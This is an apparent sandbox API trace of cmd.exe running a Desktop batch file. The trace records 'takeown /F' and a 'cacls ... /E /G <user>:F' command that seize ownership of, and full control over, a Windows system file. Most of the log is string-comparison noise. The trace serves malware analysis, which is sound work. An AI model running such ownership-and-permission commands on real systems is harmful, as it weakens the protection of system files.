0x2 [0299.132] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0299.132] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x47f454 | out: lpMode=0x47f454) returned 1 [0299.403] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.403] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x5e, lpNumberOfCharsWritten=0x47f46c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x47f46c*=0x5e) returned 1 [0299.592] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x47f490 | out: _Buffer="\r\n") returned 2 [0299.592] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.592] GetFileType (hFile=0x3c) returned 0x2 [0299.592] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0299.592] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x47f468 | out: lpMode=0x47f468) returned 1 [0299.888] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.888] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x47f480, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x47f480*=0x2) returned 1 [0300.043] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0300.044] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0300.044] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0300.044] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0300.044] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0300.044] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0300.044] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0300.044] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0300.044] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0300.044] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0300.044] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0300.044] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0300.044] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0300.044] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0300.044] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0300.044] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0300.044] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0300.044] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0300.044] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0300.044] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0300.044] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0300.044] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0300.044] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0300.044] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0300.044] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0300.044] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0300.044] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0300.044] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0300.044] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0300.044] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0300.044] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0300.044] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0300.044] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0300.045] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0300.045] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0300.045] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0300.045] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0300.045] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0300.045] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0300.045] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0300.045] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0300.045] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0300.045] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0300.045] SetErrorMode (uMode=0x0) returned 0x0 [0300.045] SetErrorMode (uMode=0x1) returned 0x0 [0300.045] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7bbf38, lpFilePart=0x47f22c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x47f22c*="Desktop") returned 0x1d [0300.045] SetErrorMode (uMode=0x0) returned 0x1 [0300.045] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0300.045] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0300.047] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0300.047] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0300.047] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x47efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47efb8) returned 0xffffffff [0300.047] GetLastError () returned 0x2 [0300.047] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0300.047] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x47efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47efb8) returned 0xffffffff [0300.047] GetLastError () returned 0x2 [0300.047] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0300.047] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x47efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47efb8) returned 0x7bc2d0 [0300.047] FindClose (in: hFindFile=0x7bc2d0 | out: hFindFile=0x7bc2d0) returned 1 [0300.048] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x47efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47efb8) returned 0xffffffff [0300.048] GetLastError () returned 0x2 [0300.048] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x47efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47efb8) returned 0x7bc2d0 [0300.048] FindClose (in: hFindFile=0x7bc2d0 | out: hFindFile=0x7bc2d0) returned 1 [0300.048] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0300.049] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0300.049] GetConsoleTitleW (in: lpConsoleTitle=0x47f000, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0300.217] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0300.217] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0300.217] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0300.217] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0300.217] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0300.217] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0300.217] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0300.217] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0300.217] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0300.217] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0300.217] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0300.217] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0300.217] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0300.217] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0300.217] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0300.217] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0300.217] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0300.217] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0300.217] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0300.217] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0300.217] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0300.217] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0300.217] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0300.217] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0300.217] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0300.217] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0300.218] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0300.218] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0300.218] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0300.218] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0300.218] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0300.218] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0300.218] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0300.218] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0300.218] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0300.218] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0300.218] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0300.218] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0300.218] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0300.218] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0300.218] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0300.218] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0300.218] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0300.218] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0300.218] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0300.218] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0300.218] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0300.218] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0300.218] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0300.218] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0300.218] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0300.218] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0300.218] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0300.218] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0300.218] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0300.218] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0300.218] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0300.218] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0300.218] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0300.218] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0300.218] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0300.218] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0300.218] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0300.218] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0300.218] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0300.218] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0300.218] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0300.218] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0300.218] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0300.218] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0300.218] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0300.218] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0300.218] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0300.218] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0300.218] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0300.219] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0300.219] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0300.219] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0300.219] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0300.219] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0300.219] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0300.219] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0300.219] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0300.219] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0300.219] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0300.219] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0300.219] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0300.219] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0300.219] SetErrorMode (uMode=0x0) returned 0x0 [0300.219] SetErrorMode (uMode=0x1) returned 0x0 [0300.219] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7bc5c8, lpFilePart=0x47eb0c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x47eb0c*="Desktop") returned 0x1d [0300.219] SetErrorMode (uMode=0x0) returned 0x1 [0300.219] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0300.219] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0300.219] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0300.219] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0300.219] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x47e898, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47e898) returned 0xffffffff [0300.220] GetLastError () returned 0x2 [0300.220] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0300.220] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x47e898, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47e898) returned 0xffffffff [0300.220] GetLastError () returned 0x2 [0300.220] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0300.220] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x47e898, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47e898) returned 0x7bc960 [0300.220] FindClose (in: hFindFile=0x7bc960 | out: hFindFile=0x7bc960) returned 1 [0300.220] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x47e898, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47e898) returned 0xffffffff [0300.220] GetLastError () returned 0x2 [0300.220] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x47e898, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47e898) returned 0x7bc960 [0300.220] FindClose (in: hFindFile=0x7bc960 | out: hFindFile=0x7bc960) returned 1 [0300.220] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0300.220] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0300.221] GetConsoleTitleW (in: lpConsoleTitle=0x47ed8c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0300.506] InitializeProcThreadAttributeList (in: lpAttributeList=0x47ecb8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x47ec9c | out: lpAttributeList=0x47ecb8, lpSize=0x47ec9c) returned 1 [0300.506] UpdateProcThreadAttribute (in: lpAttributeList=0x47ecb8, dwFlags=0x0, Attribute=0x60001, lpValue=0x47eca4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x47ecb8, lpPreviousValue=0x0) returned 1 [0300.506] GetStartupInfoW (in: lpStartupInfo=0x47ecf0 | out: lpStartupInfo=0x47ecf0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0300.506] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0300.506] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0300.506] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0300.506] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0300.506] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0300.506] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0300.506] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0300.506] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0300.506] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0300.506] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0300.506] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0300.506] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0300.506] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0300.506] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0300.506] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0300.506] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0300.506] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0300.506] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0300.506] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0300.506] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0300.506] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0300.506] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0300.506] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0300.506] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0300.507] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0300.507] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0300.507] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0300.507] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0300.507] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0300.507] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0300.507] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0300.507] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0300.507] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0300.507] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0300.507] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0300.507] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0300.507] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0300.507] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0300.507] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0300.509] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\" /E /G CIiHmnxMn6Ps:F /C", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x47ec40*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\" /E /G CIiHmnxMn6Ps:F /C", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x47ec8c | out: lpCommandLine="cacls \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\" /E /G CIiHmnxMn6Ps:F /C", lpProcessInformation=0x47ec8c*(hProcess=0xb8, hThread=0xb0, dwProcessId=0xa44, dwThreadId=0x148)) returned 1 [0300.520] CloseHandle (hObject=0xb0) returned 1 [0300.520] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0300.520] GetEnvironmentStringsW () returned 0x7b9e20* [0300.520] FreeEnvironmentStringsA (penv="=") returned 1 [0300.520] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0301.093] GetExitCodeProcess (in: hProcess=0xb8, lpExitCode=0x47ec24 | out: lpExitCode=0x47ec24*=0x0) returned 1 [0301.093] CloseHandle (hObject=0xb8) returned 1 [0301.093] _vsnwprintf (in: _Buffer=0x47ed0c, _BufferCount=0x13, _Format="%08X", _ArgList=0x47ec2c | out: _Buffer="00000000") returned 8 [0301.093] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0301.093] GetEnvironmentStringsW () returned 0x7be410* [0301.093] FreeEnvironmentStringsA (penv="=") returned 1 [0301.093] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0301.093] GetEnvironmentStringsW () returned 0x7be410* [0301.094] FreeEnvironmentStringsA (penv="=") returned 1 [0301.094] DeleteProcThreadAttributeList (in: lpAttributeList=0x47ecb8 | out: lpAttributeList=0x47ecb8) [0301.094] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.094] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0301.122] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.122] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0301.122] _get_osfhandle (_FileHandle=0) returned 0x38 [0301.122] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0301.122] SetConsoleInputExeNameW () returned 0x1 [0301.122] GetConsoleOutputCP () returned 0x1b5 [0301.122] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0301.122] SetThreadUILanguage (LangId=0x0) returned 0x409 [0301.123] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x47f44c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0301.123] _open_osfhandle (_OSFileHandle=0xb8, _Flags=8) returned 3 [0301.123] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.123] SetFilePointer (in: hFile=0xb8, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0301.123] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.123] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0301.123] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x47f41c, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x47f41c*=0xc2, lpOverlapped=0x0) returned 1 [0301.124] SetFilePointer (in: hFile=0xb8, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0301.124] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0301.124] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.124] GetFileType (hFile=0xb8) returned 0x1 [0301.124] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.124] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0301.124] _wcsicmp (_String1="takeown", _String2=")") returned 75 [0301.124] _wcsicmp (_String1="FOR", _String2="takeown") returned -14 [0301.124] _wcsicmp (_String1="FOR/?", _String2="takeown") returned -14 [0301.124] _wcsicmp (_String1="IF", _String2="takeown") returned -11 [0301.124] _wcsicmp (_String1="IF/?", _String2="takeown") returned -11 [0301.124] _wcsicmp (_String1="REM", _String2="takeown") returned -2 [0301.124] _wcsicmp (_String1="REM/?", _String2="takeown") returned -2 [0301.125] _tell (_FileHandle=3) returned 47 [0301.125] _close (_FileHandle=3) returned 0 [0301.125] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x47f1e0 | out: _Buffer="\r\n") returned 2 [0301.125] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.125] GetFileType (hFile=0x3c) returned 0x2 [0301.125] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.125] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x47f1b8 | out: lpMode=0x47f1b8) returned 1 [0301.125] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.125] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x47f1d0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x47f1d0*=0x2) returned 1 [0301.125] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0301.125] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0301.125] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", 